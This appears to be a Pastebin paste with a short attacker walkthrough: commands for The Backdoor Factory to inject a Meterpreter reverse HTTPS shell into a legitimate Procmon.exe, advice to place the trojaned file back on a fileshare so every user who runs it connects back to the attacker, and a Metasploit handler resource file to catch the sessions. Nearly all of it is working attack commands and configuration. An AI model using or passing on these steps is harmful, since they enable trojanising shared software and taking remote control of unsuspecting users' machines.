SH1NU11b1

backdoorfactor

Nov 7th, 2016
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.20 KB | None | 0 0
  1. Open up a terminal using the following commands:
  2. ● cd /opt/the-backdoor-factory/
  3. ● ./backdoor.py -f ~/Desktop/Procmon.exe -s meterpreter_reverse_https -H <your Kali IP> -
  4. P 8080
  5.  
  6. Once you execute backdoor.py, you need to find a Cave, which is an area of 0’s to hold your
  7. shellcode. If you don’t like the locations initially suggested, you can press “j” or jump to see
  8. additional caves.
  9.  
  10.  
  11. Once you find a cave that works, press “a” to append your code. After this is complete, BDF will
  12. drop the newly created executable in the folder backdoored.
  13. Now, take that file and put it back on the fileshare. The file should execute perfectly, the user will
  14. still have all the functionality of Procmon, but every time they run it, it will connect back to our
  15. Metasploit handler.
  16.  
  17. Just in case you forgot how to create a handler for your file, this is what it will look like. On your
  18. Kali host, copy the following text to a file on /opt/listener.rc:
  19. use exploit/multi/handler
  20. set PAYLOAD windows/meterpreter/reverse_https
  21. set LHOST <Your Kali IP>
  22. set LPORT 8080
  23. set ExitOnSession false
  24. exploit -j –z
  25. To start your listener, use the following command:
  26. msfconsole -r /opt/listner.rcIP
Add Comment
Please, Sign In to add comment